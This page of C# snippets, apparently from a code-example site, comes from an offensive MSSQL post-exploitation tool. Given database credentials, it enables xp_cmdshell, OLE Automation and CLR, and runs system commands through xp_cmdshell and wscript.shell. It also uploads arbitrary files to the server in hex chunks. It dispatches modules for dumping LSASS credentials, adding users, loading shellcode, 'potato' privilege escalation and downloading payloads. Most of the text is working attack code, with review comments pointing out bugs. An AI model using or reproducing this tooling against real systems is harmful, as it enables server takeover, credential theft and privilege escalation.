Пример #1
        /// <summary>
        /// Entry point: builds a connection from the three positional arguments
        /// (via SqlConnet, not shown here) and runs a "SQL> " read/dispatch loop
        /// until "exit", a dropped connection, or any exception in the loop body.
        /// </summary>
        /// <param name="args">Exactly three values, handed verbatim to SqlConnet.</param>
        static void Main(string[] args)
        {
            if (args.Length != 3)
            {
                Info.ShowUsage();
                return;
            }

            var Conn         = SqlConnet(args[0], args[1], args[2]);
            var setting      = new Setting(Conn);
            var filesOptions = new FilesOptions(Conn, setting);
            var execOptions  = new ExecOptions(Conn, setting);

            try
            {
                do
                {
                    Console.Write("SQL> ");
                    // Console.ReadLine() returns null at end of input; the ToLower()
                    // below then throws NullReferenceException, which the catch at the
                    // bottom turns into a closed connection and the end of the loop.
                    string str = Console.ReadLine();
                    // NOTE(review): ToLower() is culture-sensitive; an ordinal
                    // case-insensitive comparison is the usual choice for keywords.
                    if (str.ToLower() == "exit")
                    {
                        Conn.Close(); break;
                    }
                    else if (str.ToLower() == "help")
                    {
                        Info.ShowModuleUsage(); continue;
                    }

                    // At most three tokens: the module name, its first argument, and
                    // the untouched remainder of the line.
                    string[] cmdline = str.Split(new char[] { ' ' }, 3);
                    // Everything after the module name, re-joined with a trailing space.
                    String   s       = String.Empty;
                    for (int i = 1; i < cmdline.Length; i++)
                    {
                        s += cmdline[i] + " ";
                    }

                    switch (cmdline[0].ToLower())
                    {
                    case "enable_xp_cmdshell":
                        setting.Enable_xp_cmdshell();
                        break;

                    case "disable_xp_cmdshell":
                        setting.Disable_xp_cmdshell();
                        break;

                    case "xp_cmdshell":
                        execOptions.xp_cmdshell(s);
                        break;

                    case "enable_ole":
                        // The Setting method is spelled "ola"; the module name is "ole".
                        setting.Enable_ola();
                        break;

                    case "disable_ole":
                        setting.Disable_ole();
                        break;

                    case "sp_cmdshell":
                        execOptions.sp_cmdshell(s);
                        break;

                    case "upload":
                        // cmdline[1]/cmdline[2] are indexed unchecked: with fewer than
                        // two arguments the IndexOutOfRangeException reaches the catch
                        // below, which closes the connection and ends the session.
                        filesOptions.UploadFiles(cmdline[1], cmdline[2]);
                        break;

                    case "download":
                        // Argument order is the reverse of "upload"; confirm against the
                        // DownloadFiles signature (not shown here).
                        filesOptions.DownloadFiles(cmdline[2], cmdline[1]);
                        break;

                    default:
                        // Any unrecognised line is sent to the server as raw T-SQL.
                        Console.WriteLine(Batch.RemoteExec(Conn, str, true));
                        break;
                    }
                    if (!ConnectionState.Open.Equals(Conn.State))
                    {
                        Console.WriteLine("[!] Disconnect....");
                        break;
                    }
                }while (true);
            }
            catch (Exception ex)
            {
                // Any exception from the loop body ends the session; only the message
                // (not the type or stack trace) is reported.
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #2
        /// <summary>
        /// One-shot mode: connects with args[0..2], runs the single module named in
        /// args[3] with the remaining arguments, then closes the connection.
        /// </summary>
        /// <param name="args">target, username, password, module, then the module's own arguments.</param>
        static void Noninteractive(string[] args)
        {
            if (args.Length < 4)
            {
                Help();
                return;
            }
            string target   = args[0];
            string username = args[1];
            string password = args[2];
            string module   = args[3];

            try
            {
                // Establish the SQL connection. The values are inserted unquoted, so a
                // ';' inside any of them changes how the connection string is parsed;
                // the password is held in plain text in this string.
                string connectionString = String.Format("Server = {0};Database = master;User ID = {1};Password = {2};", target, username, password);
                Conn              = new SqlConnection(connectionString);
                // OnInfoMessage (not shown here) receives server-side info messages.
                Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
                Conn.Open();
                Console.WriteLine("[*] Database connection is successful!");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
                // NOTE(review): exits with status 0 although the connection failed; a
                // non-zero code would let a calling script detect the failure.
                Environment.Exit(0);
            }

            setting = new Setting(Conn);
            try
            {
                // string[] cmdline = str.Split(new char[] { ' ' }, 3);

                // Only args.Length >= 4 was verified above. Every branch that reads
                // args[4] or args[5] relies on the catch at the bottom when those
                // arguments are absent.
                switch (module.ToLower())
                {
                case "enable_xp_cmdshell":
                    setting.Enable_xp_cmdshell();
                    break;

                case "disable_xp_cmdshell":
                    setting.Disable_xp_cmdshell();
                    break;

                case "xp_cmdshell":
                {
                    // Six or more arguments: args[4..] re-joined with trailing spaces.
                    // Exactly five: args[4] used as-is. Exactly four: args[4] throws.
                    String command = String.Empty;
                    if (args.Length > 5)
                    {
                        for (int i = 4; i < args.Length; i++)
                        {
                            command += args[i] + " ";
                        }
                    }
                    else
                    {
                        command = args[4];
                    }
                    xp_shell(command);
                    break;
                }

                case "sp_oacreate":
                {
                    // Same argument handling as "xp_cmdshell"; the extra brace level
                    // has no effect.
                    {
                        String command = String.Empty;
                        if (args.Length > 5)
                        {
                            for (int i = 4; i < args.Length; i++)
                            {
                                command += args[i] + " ";
                            }
                        }
                        else
                        {
                            command = args[4];
                        }
                        sp_shell(command);
                        break;
                    }
                }

                case "upload":
                    // args[4] = local path, args[5] = remote path.
                    UploadFiles(args[4], args[5]);
                    break;

                case "download":
                    // Argument order is the reverse of "upload"; confirm against the
                    // DownloadFiles signature (not shown here).
                    DownloadFiles(args[5], args[4]);
                    break;

                case "enable_ole":
                    // The Setting method is spelled "ola"; the module name is "ole".
                    setting.Enable_ola();
                    break;

                case "disable_ole":
                    setting.Disable_ole();
                    break;

                // For these three the module name itself is the whole argument string.
                case "clr_dumplsass":
                    clr_exec("clr_dumplsass");
                    break;

                case "clr_rdp":
                    clr_exec("clr_rdp");
                    break;

                case "clr_getav":
                    clr_exec("clr_getav");
                    break;

                // For the four cases below the join starts at index 3, so the module
                // name is the first token handed to clr_exec, followed by args[4..].
                case "clr_adduser":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader2":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_download":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "enable_clr":
                    setting.Enable_clr();
                    break;

                case "disable_clr":
                    setting.Disable_clr();
                    break;

                case "install_clr":
                {
                    // Three Setting steps run back to back; none of their results is
                    // checked before the success line is printed.
                    setting.Set_permission_set();
                    setting.CREATE_ASSEMBLY();
                    setting.CREATE_PROCEDURE();
                    Console.WriteLine("[+] Install crl successful!");
                    break;
                }

                case "uninstall_clr":
                    setting.drop_clr();
                    break;

                default:
                    // An unrecognised module string (args[3]) is sent as raw T-SQL.
                    Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
                    break;
                }
                if (!ConnectionState.Open.Equals(Conn.State))
                {
                    Console.WriteLine("[!] Disconnect....");
                }
                Conn.Close();
            }
            catch (Exception ex)
            {
                // Only the message (not the type or stack trace) is reported.
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #3
 /// <summary>
 /// Runs a command line through xp_cmdshell on the shared connection and prints
 /// whatever Batch.RemoteExec returns. The command is placed inside a single-quoted
 /// T-SQL literal without any escaping, so a Command containing a single quote
 /// does not produce the statement intended.
 /// </summary>
 /// <param name="Command">Command line handed to xp_cmdshell.</param>
 static void xp_shell(String Command)
 {
     // Same text as the String.Format form; the statement is kept in the shared
     // sqlstr field, as every other helper in this file does.
     string statement = "exec master..xp_cmdshell '" + Command + "'";
     sqlstr = statement;
     var output = Batch.RemoteExec(Conn, sqlstr, true);
     Console.WriteLine(output);
 }
Пример #4
        /// <summary>
        /// Interactive mode: connects with args[0..2] and runs a "SQL> " read/dispatch
        /// loop until "exit", a dropped connection, or any exception in the loop body.
        /// </summary>
        /// <param name="args">target, username, password. There is no length check: fewer
        /// than three values throw IndexOutOfRangeException outside any try block.</param>
        static void interactive(string[] args)
        {
            string target   = args[0];
            string username = args[1];
            string password = args[2];

            try
            {
                // Establish the SQL connection. Each value is wrapped in double quotes
                // here; the password is held in plain text in this string.
                string connectionString = String.Format("Server = \"{0}\";Database = \"master\";User ID = \"{1}\";Password = \"{2}\";", target, username, password);
                Conn              = new SqlConnection(connectionString);
                // OnInfoMessage (not shown here) receives server-side info messages.
                Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
                Conn.Open();
                Console.WriteLine("[*] Database connection is successful!");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
                // NOTE(review): exits with status 0 although the connection failed.
                Environment.Exit(0);
            }

            setting = new Setting(Conn);

            try
            {
                do
                {
                    Console.Write("SQL> ");
                    // Console.ReadLine() returns null at end of input; the ToLower()
                    // below then throws NullReferenceException, which the catch at the
                    // bottom turns into a closed connection and the end of the loop.
                    string str = Console.ReadLine();
                    if (str.ToLower() == "exit")
                    {
                        Conn.Close(); break;
                    }
                    else if (str.ToLower() == "help")
                    {
                        Help(); continue;
                    }

                    // At most three tokens: the module name, its first argument, and
                    // the untouched remainder of the line.
                    string[] cmdline = str.Split(new char[] { ' ' }, 3);

                    switch (cmdline[0].ToLower())
                    {
                    case "enable_xp_cmdshell":
                        setting.Enable_xp_cmdshell();
                        break;

                    case "disable_xp_cmdshell":
                        setting.Disable_xp_cmdshell();
                        break;

                    case "xp_cmdshell":
                    {
                        // Tokens after the module name, re-joined with trailing spaces.
                        String s = String.Empty;
                        for (int i = 1; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        xp_shell(s);
                        break;
                    }

                    case "sp_oacreate":
                    {
                        String s = String.Empty;
                        for (int i = 1; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        sp_shell(s);
                        break;
                    }

                    case "upload":
                        // cmdline[1]/cmdline[2] are indexed unchecked: with fewer than
                        // two arguments the IndexOutOfRangeException reaches the catch
                        // below, which closes the connection and ends the session.
                        UploadFiles(cmdline[1], cmdline[2]);
                        break;

                    case "download":
                        // Argument order is the reverse of "upload"; confirm against the
                        // DownloadFiles signature (not shown here).
                        DownloadFiles(cmdline[2], cmdline[1]);
                        break;

                    case "enable_ole":
                        // The Setting method is spelled "ola"; the module name is "ole".
                        setting.Enable_ola();
                        break;

                    case "disable_ole":
                        setting.Disable_ole();
                        break;

                    // For these three the module name itself is the whole argument string.
                    case "clr_dumplsass":
                        clr_exec("clr_dumplsass");
                        break;

                    case "clr_rdp":
                        clr_exec("clr_rdp");
                        break;

                    case "clr_getav":
                        clr_exec("clr_getav");
                        break;

                    // For the four cases below the join starts at index 0, so the whole
                    // line including the module name is handed to clr_exec.
                    case "clr_adduser":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "clr_scloader":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "clr_scloader2":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "clr_download":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "enable_clr":
                        setting.Enable_clr();
                        break;

                    case "disable_clr":
                        setting.Disable_clr();
                        break;

                    case "install_clr":
                    {
                        // Three Setting steps run back to back; none of their results
                        // is checked before the completion line is printed.
                        setting.Set_permission_set();
                        setting.CREATE_ASSEMBLY();
                        setting.CREATE_PROCEDURE();
                        Console.WriteLine("[+] Install clr done.");
                        break;
                    }

                    case "uninstall_clr":
                        setting.drop_clr();
                        break;

                    default:
                        // Any unrecognised line is sent to the server as raw T-SQL.
                        Console.WriteLine(Batch.RemoteExec(Conn, str, true));
                        break;
                    }
                    if (!ConnectionState.Open.Equals(Conn.State))
                    {
                        Console.WriteLine("[!] Disconnect....");
                        break;
                    }
                }while (true);
            }
            catch (Exception ex)
            {
                // Any exception from the loop body ends the session; only the message
                // (not the type or stack trace) is reported.
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #5
        /// <summary>
        /// File upload using ADODB.Stream through the OLE Automation Procedures: the local
        /// file is hex-encoded, split into chunks that are each written to
        /// "{remoteFile}_{n}.config_txt", then joined with "copy /b" via wscript.shell and
        /// the chunk files are deleted.
        /// </summary>
        /// <param name="localFile">Local file to read (File.ReadAllBytes).</param>
        /// <param name="remoteFile">Destination path on the server.</param>
        static void UploadFiles(String localFile, String remoteFile)
        {
            Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));

            // NOTE(review): this returns when Enable_ola() reports true, which is the
            // opposite sense from the `&& !setting.Enable_ola()` form used in the other
            // UploadFiles variant on this page; confirm which outcome Enable_ola's return
            // value signals.
            if (setting.Check_configuration("Ole Automation Procedures", 0))
            {
                if (setting.Enable_ola())
                {
                    return;
                }
            }

            // Number of chunks written so far; also used to name the chunk files (1-based).
            int count = 0;

            try
            {
                string    hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2")));
                // GetSeparateSubString (not shown here) presumably splits the hex text
                // into pieces of at most 150000 characters; an empty file would then
                // leave count at 0 and the "copy /b " statement below without its
                // closing quote.
                ArrayList arrlist   = GetSeparateSubString(hexString, 150000);

                foreach (string hex150000 in arrlist)
                {
                    count++;
                    string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count);

                    // One chunk per round-trip: the hex chunk becomes a 0x... binary
                    // literal and is saved to the chunk file (SaveToFile option 2).
                    sqlstr = String.Format(@"
                        DECLARE @ObjectToken INT
                        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
                        EXEC sp_OASetProperty @ObjectToken, 'Type', 1
                        EXEC sp_OAMethod @ObjectToken, 'Open'
                        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
                        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
                        EXEC sp_OAMethod @ObjectToken, 'Close'
                        EXEC sp_OADestroy @ObjectToken", hex150000, filePath);
                    Batch.RemoteExec(Conn, sqlstr, false);
                    if (setting.File_Exists(filePath, 1))
                    {
                        // Prints "total-current".
                        Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count);
                    }
                    else
                    {
                        // NOTE(review): terminates the whole process (exit status 0) from
                        // inside a helper; chunk files already written are left in place
                        // because the cleanup below never runs.
                        Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count);
                        Conn.Close();
                        Environment.Exit(0);
                    }

                    // Fixed pause between chunks.
                    Thread.Sleep(5000);
                }

                // Prefix shared by the two wscript.shell statements below; the cmd.exe
                // command line is left open and closed by the "'" appended to sqlstr.
                string shell = String.Format(@"
                    DECLARE @SHELL INT 
                    EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT 
                    EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");

                // "copy /b part_1+part_2+...+part_n remoteFile'".
                sqlstr = "copy /b ";
                for (int i = 1; i < count + 1; i++)
                {
                    if (i != count)
                    {
                        sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i);
                    }
                    else
                    {
                        sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i);
                    }
                }

                Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
                Batch.RemoteExec(Conn, shell + sqlstr, false);
                Thread.Sleep(5000);

                // Replace(Path.GetFileName(remoteFile), "") leaves the directory prefix.
                // NOTE(review): when remoteFile has no directory part this prefix is
                // empty and "del *.config_txt" runs in cmd.exe's current directory.
                sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
                Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
                Batch.RemoteExec(Conn, shell + sqlstr, false);

                if (setting.File_Exists(remoteFile, 1))
                {
                    Console.WriteLine("[*] '{0}' Upload completed", localFile);
                }
            }
            catch (Exception ex)
            {
                // Only the message (not the type or stack trace) is reported.
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #6
 /// <summary>
 /// Invokes the dbo.ClrExec stored procedure on the shared connection with the given
 /// argument string, which is placed unescaped inside a single-quoted T-SQL literal
 /// (a single quote in Command therefore does not produce the statement intended).
 /// </summary>
 /// <param name="Command">Argument string passed to dbo.ClrExec.</param>
 static void clr_exec(String Command)
 {
     // Same text as the String.Format form; the statement is kept in the shared
     // sqlstr field, as every other helper in this file does.
     string statement = "exec dbo.ClrExec '" + Command + "'";
     sqlstr = statement;
     Batch.CLRExec(Conn, sqlstr);
 }
Пример #7
        /// <summary>
        /// One-shot mode: connects with args[0..3] (target, user, password, database),
        /// runs the single module named in args[4] with the remaining arguments, then
        /// closes the connection.
        /// </summary>
        /// <param name="args">target[:port], username, password, database, module, then the module's own arguments.</param>
        static void Noninteractive(string[] args)
        {
            // NOTE(review): this guard only covers args[0..3]; module = args[4] below is
            // read outside any try block, so exactly four arguments end in an
            // IndexOutOfRangeException instead of Help(). The check should be `< 5`.
            if (args.Length < 4)
            {
                Help();
                return;
            }
            string target = args[0];

            // "host:port" is rewritten to the "host,port" form the SQL client expects.
            if (target.Contains(":"))
            {
                target = target.Replace(":", ",");
            }
            string username = args[1];
            string password = args[2];
            string database = args[3];
            string module   = args[4];

            try
            {
                // Establish the SQL connection. Each value is wrapped in double quotes;
                // the password is held in plain text in this string.
                string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
                Conn              = new SqlConnection(connectionString);
                // OnInfoMessage (not shown here) receives server-side info messages.
                Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
                Conn.Open();
                Console.WriteLine("[*] Database connection is successful!");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
                // NOTE(review): exits with status 0 although the connection failed; a
                // non-zero code would let a calling script detect the failure.
                Environment.Exit(0);
            }

            setting = new Setting(Conn);
            try
            {
                // string[] cmdline = str.Split(new char[] { ' ' }, 3);

                // Branches that read args[5] or args[6] rely on the catch at the bottom
                // when those arguments are absent.
                switch (module.ToLower())
                {
                case "enable_xp_cmdshell":
                    setting.Enable_xp_cmdshell();
                    break;

                case "disable_xp_cmdshell":
                    setting.Disable_xp_cmdshell();
                    break;

                case "xp_cmdshell":
                {
                    // Seven or more arguments: args[5..] re-joined with trailing spaces.
                    // Exactly six: args[5] used as-is. Exactly five: args[5] throws.
                    String command = String.Empty;
                    if (args.Length > 6)
                    {
                        for (int i = 5; i < args.Length; i++)
                        {
                            command += args[i] + " ";
                        }
                    }
                    else
                    {
                        command = args[5];
                    }
                    xp_shell(command);
                    break;
                }

                case "sp_oacreate":
                {
                    // Same argument handling as "xp_cmdshell"; the extra brace level
                    // has no effect.
                    {
                        String command = String.Empty;
                        if (args.Length > 6)
                        {
                            for (int i = 5; i < args.Length; i++)
                            {
                                command += args[i] + " ";
                            }
                        }
                        else
                        {
                            command = args[5];
                        }
                        sp_shell(command);
                        break;
                    }
                }

                case "upload":
                    // args[5] = local path, args[6] = remote path.
                    UploadFiles(args[5], args[6]);
                    break;

                case "download":
                    // Argument order is the reverse of "upload"; confirm against the
                    // DownloadFiles signature (not shown here).
                    DownloadFiles(args[6], args[5]);
                    break;

                case "enable_ole":
                    // The Setting method is spelled "ola"; the module name is "ole".
                    setting.Enable_ola();
                    break;

                case "disable_ole":
                    setting.Disable_ole();
                    break;

                // For every clr_* case that joins from index 4, the module name is the
                // first token handed to clr_exec, followed by args[5..].
                case "clr_dumplsass":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_ping":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_cat":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_ls":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_cd":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_rm":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                // For these five the module name itself is the whole argument string.
                case "clr_pwd":
                    clr_exec("clr_pwd");
                    break;

                case "clr_netstat":
                    clr_exec("clr_netstat");
                    break;

                case "clr_ps":
                    clr_exec("clr_ps");
                    break;

                case "clr_rdp":
                    clr_exec("clr_rdp");
                    break;

                case "clr_getav":
                    clr_exec("clr_getav");
                    break;

                case "clr_adduser":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_exec":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_efspotato":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_badpotato":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader1":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader2":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_download":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_combine":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "enable_clr":
                    setting.Enable_clr();
                    break;

                case "disable_clr":
                    setting.Disable_clr();
                    break;

                case "install_clr":
                {
                    setting.install_clr();
                    break;
                }

                case "uninstall_clr":
                    setting.drop_clr();
                    break;

                default:
                    // NOTE(review): args[3] is the database name in this variant, not
                    // the module (args[4]); an unrecognised module therefore sends the
                    // database name to the server as raw T-SQL. Presumably args[4] was
                    // meant, matching the variant where module sits at args[3].
                    Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
                    break;
                }
                if (!ConnectionState.Open.Equals(Conn.State))
                {
                    Console.WriteLine("[!] Disconnect....");
                }
                Conn.Close();
            }
            catch (Exception ex)
            {
                // Only the message (not the type or stack trace) is reported.
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #8
        /// <summary>
        /// File upload using ADODB.Stream through the OLE Automation Procedures: the local
        /// file is split into byte chunks (sizes from SplitFileSize), each hex-encoded and
        /// written to "{remoteFile}_{n}.config_txt", then joined with "copy /b" via
        /// wscript.shell; the chunk files are deleted only once the joined file exists.
        /// </summary>
        /// <param name="localFile">Local file to read (via ReadFileToByte, not shown here).</param>
        /// <param name="remoteFile">Destination path on the server; nothing is done if it already exists.</param>
        static void UploadFiles(String localFile, String remoteFile)
        {
            Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));

            // Bail out only when the procedures are off and enabling them fails
            // (assuming Enable_ola returns true on success - confirm in Setting).
            if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola())
            {
                return;
            }
            // Not inside the try below: a read failure propagates to the caller.
            byte[] byteArray = ReadFileToByte(localFile);
            // Accumulates the "copy /b "part"+"part"+..." command line.
            string text      = "copy /b ";

            if (setting.File_Exists(remoteFile, 1))
            {
                Console.WriteLine("[+] {0} Exists", remoteFile);
                return;
            }
            // num: chunk index (0-based in file names, see note below); num2: byte offset
            // of the next chunk within byteArray.
            int        num         = 0;
            int        num2        = 0;
            int        splitLength = 250000;
            // SplitFileSize (not shown here) presumably yields chunk sizes that sum to
            // byteArray.Length; Array.Copy below throws if they do not.
            List <int> list        = SplitFileSize(byteArray.Length, splitLength);

            try
            {
                foreach (int num3 in list)
                {
                    string text2 = string.Format("{0}_{1}.config_txt", remoteFile, num);
                    byte[] array = new byte[num3];
                    Array.Copy(byteArray, num2, array, 0, num3);
                    string hexstr = string.Concat(from b in array
                                                  select b.ToString("X2"));
                    // One chunk per round-trip: the hex chunk becomes a 0x... binary
                    // literal and is saved to the chunk file (SaveToFile option 2).
                    sqlstr = String.Format(@"
                        DECLARE @ObjectToken INT
                        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
                        EXEC sp_OASetProperty @ObjectToken, 'Type', 1
                        EXEC sp_OAMethod @ObjectToken, 'Open'
                        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
                        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
                        EXEC sp_OAMethod @ObjectToken, 'Close'
                        EXEC sp_OADestroy @ObjectToken", hexstr, text2);
                    Batch.RemoteExec(Conn, sqlstr, false);
                    num2 += num3;
                    num++;
                    text = text + "\"" + text2 + "\"+";
                    Thread.Sleep(1000);
                    if (setting.File_Exists(text2, 1))
                    {
                        // NOTE(review): num was incremented above, so this line names
                        // "_{num}" while the file just checked is "_{num-1}" (text2).
                        Console.WriteLine("[+] {0}_{1}.config_txt Upload completed", remoteFile, num);
                    }
                    else
                    {
                        // NOTE(review): terminates the whole process (exit status 0)
                        // from inside a helper; chunk files already written are left in
                        // place because the cleanup below never runs.
                        Console.WriteLine("[!] {0}_{1}.config_txt Error uploading", remoteFile, num);
                        Conn.Close();
                        Environment.Exit(0);
                    }

                    Thread.Sleep(1000);
                }

                // Drop the trailing '+' left by the loop, then add the destination and
                // the quote that closes the cmd.exe command line opened in shell below.
                text = text.Trim(new char[]
                {
                    '+'
                }) + " \"" + remoteFile + "\"'";
                string shell = String.Format(@"
                    DECLARE @SHELL INT 
                    EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT 
                    EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");

                Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
                Batch.RemoteExec(Conn, shell + text, false);
                Thread.Sleep(1000);

                // Chunk files are removed only once the joined file is confirmed;
                // otherwise they stay on the server.
                if (setting.File_Exists(remoteFile, 1))
                {
                    // Replace(Path.GetFileName(remoteFile), "") leaves the directory
                    // prefix; when remoteFile has no directory part this prefix is empty
                    // and "del *.config_txt" runs in cmd.exe's current directory.
                    sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
                    Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
                    Batch.RemoteExec(Conn, shell + sqlstr, false);
                    Console.WriteLine("[*] '{0}' Upload completed", localFile);
                }
                //setting.Disable_ole();
            }
            catch (Exception ex)
            {
                // Only the message (not the type or stack trace) is reported.
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }